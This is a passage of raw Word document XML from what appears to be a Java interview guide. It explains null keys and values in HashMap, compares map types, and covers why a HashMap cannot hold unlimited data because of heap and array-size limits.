          <v:rect id="_x0000_i1533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0F5F9" w14:textId="77777777" w:rsidR="00DB7EDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB7EDC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc196307653"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can we store null value in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="6C93F05A" w14:textId="3E29C7D6" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="00F20F31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 we can store null values in a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02789A18" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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et’s break it down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC45AF" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C7C">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00F2E82">
          <v:rect id="_x0000_i1534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA48E8" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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Null Key and Null Value in HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375BC034" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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Null Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E94F26" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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hMap allows exactly one null key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E50D9" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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null is used as a key, it is always mapped to the bucket at index 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C0744" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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838036"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="601F7E50" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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838036"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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NullKeyValue"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60795BE7" w14:textId="085E2E08" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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838036"/>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 NullKeyValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A97343" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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Null Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7A329" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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hMap allows multiple keys to be mapped to null values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707ACF1" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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470610"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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key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p>
    <w:p w14:paraId="3C8275A3" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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470610"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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key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p>
    <w:p w14:paraId="1F4E631D" w14:textId="4248F5B1" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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470610"/>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 {null=NullKeyValue, key1=null, key2=null}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2A695" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C7C">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177FB54">
          <v:rect id="_x0000_i1535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD6650" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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Be Careful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AF025" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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ther map types behave differentl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8"/>
        <w:gridCol w:w="883"/>
        <w:gridCol w:w="1578"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="742051A2" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1B7032" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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p Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06ABDCD9" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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ull Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A442A88" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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ull Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="1EF54787" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E8B6D4" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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hMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78BAA9F8" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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1 key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C178FD2" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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many</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="361CF173" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C5D086" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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nkedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DD6D49" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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1 key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB663BB" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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many</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="6F011FE9" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F678DA4" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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eeMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12B17D49" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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3E200F8B" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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some cases)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="0AC08DCB" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19321460" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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htable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31445B8D" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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2678FE4D" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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r>
      <w:tr w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w14:paraId="5EF6FD81" w14:textId="77777777" w:rsidTr="001E1C7C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180C529B" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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currentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC9BE14" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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758DE0D3" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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r>
    </w:tbl>
    <w:p w14:paraId="44682BA2" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C7C">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F1B803">
          <v:rect id="_x0000_i1536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EC3A9" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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Why is only one null key allowed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85141F" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7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nally, HashMap uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F32497" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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503274"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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ke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1CF91C4" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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50327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handle specially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61DD51" w14:textId="105847F7" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95"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503274"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848FFA5" w14:textId="77777777" w:rsidR="001E1C7C" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C7C" w:rsidP="001E1C7C">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o it maps it to a special bucket (usually index 0) and ensures there's only one such entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E1E1E" w14:textId="136BC52F" w:rsidR="00DB7EDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB7ED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274BC62">
          <v:rect id="_x0000_i1537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB64609" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc196307654"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we store infinite data in a HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w14:paraId="7AC2BBE7" w14:textId="15C1E6FF" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="00C523D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, we cannot store infinite data in a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF81A9" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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ile HashMap theoretically can grow as long as memory permits (thanks to dynamic resizing), there are practical and system-level limitations that prevent it from holding "infinite" data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DE3DF" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008C17B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0839F73">
          <v:rect id="_x0000_i1538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBB3AF" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B2">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Limitations That Prevent Infinite Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5919F7" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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Heap Memory Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845E6F6" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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biggest constraint is available heap memory (RAM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA10C1" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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very entry (key + value + Node overhead) consumes memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921AE75" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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ce heap space is exhausted, you'll get an:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FC7EA" w14:textId="34CD315E" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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254515408"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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ang</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OutOfMemoryErr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Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA660B6" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Array Size Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8F0D2" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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nally, HashMap uses an array to store buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B85CE" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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maximum array size in Java is Integer.MAX_VALUE (2^31 - 1) entries — about 2.1 billion buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A475C2D" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6968D752" w14:textId="424C7593" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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GC Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76195A6D" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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massive number of objects leads to frequent garbage collection, degrading performance severely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEF3A5" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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Rehashing Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5D815" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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When the size exceeds the threshold (capacity * loadFactor), HashMap resizes and rehashes — an expensive operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF80FC" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008C17B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488DA7D">
          <v:rect id="_x0000_i1539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="600417D7" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B2">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72F3C59C" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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67845187"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="0CF0EDE8" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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67845187"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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1E3970E" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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67845187"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    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valu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p>
    <w:p w14:paraId="5D392E02" w14:textId="23ACA554" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17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67845187"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB513A" w14:textId="132A9F44" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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will eventually crash with:</w:t>
      </w:r>
      <w:r w:rsidR="00F90BBD"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception in thread "main" java.lang.OutOfMemoryError: Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F282191" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008C17B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132D3D6">
          <v:rect id="_x0000_i1540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="419CAF7D" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B2">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Best Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330512F8" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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ways design HashMap usage with estimated size and memory in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B595A6" w14:textId="77777777" w:rsidR="00CC3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC3A76" w:rsidP="008C17B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initialCapacity wisely to reduce rehashing:</w:t>
      </w:r>
    </w:p>
